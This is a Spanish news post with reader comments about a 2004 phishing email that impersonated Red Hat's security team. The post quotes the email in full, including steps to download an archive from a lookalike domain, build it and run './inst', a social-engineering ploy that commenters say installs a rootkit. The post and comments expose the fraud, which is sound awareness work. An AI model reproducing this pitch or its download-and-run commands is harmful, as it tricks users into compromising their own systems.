Cuentan en
Slashdot que se han mandado correos electrónicos diciendo ser parte del
equipo de seguridad de Red Hat y diciendo que debía ir automáticamente a
una dirección (ahora está caida) para bajar un parche y ejecutarlo.
Red Hat ya se ha dado cuenta de esto y aclara que nunca se mandan mensajes no solicitados a los usuarios, y los que se mandan se hacen siempre desde secalert @ redhat.com y
están firmados con su llave GPG.
A continuación el correo:
--
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.g
z or directly here.
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
*
./inst
Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
mkdir server
(Puntos:2)( Última bitácora: Lunes, 22 Febrero de 2016, 07:16h )
¿Vulnerabilidad remota en ls y mkdir que condecen privilegios de root (que además ni siquiera tienen bit de setuid)? Hay que ser un poco bruto...
Programs should be written for people to read, and only incidentally for machines to execute
Desde luego....
(Puntos:2)( http://blog.shalafi.net/ | Última bitácora: Jueves, 20 Septiembre de 2012, 08:58h )
Me recuerda mucho a un virus que me llegaba por correo que era de support@microsoft.com y que decia "Apply this patch inmediantly!" y adjuntaba un .zip.
Y por ultimo, ¿Desde cuando las actualizaciones se hacen en RH con un .patch que no tira contra las fuentes, como es que no es un rpm directamente (que tampoco es tan dificil de hacer, oiga) ¿./inst? donde quedo el make install o el ./install, si es que tiene toda la pinta de un procedimiento no-estandar...
Creo que para caer en eso hay que ser un poco pardillo... lo que podemos sacar en claro de todo esto es la importancia de la firma en los mensajes de correo para evitar usurpacion de personalidad electronica... que es muy facil hacer un fake mail... pero mucha gente no es consciente de ello y tiende a fiarse de lo que diga el remitente.
En fin, que son ganas de instalarte un rootkit por las buenas, ¡¡los mejores virus son los de ingenieria social!!
Un saludo, por ejemplo, Buenos dias: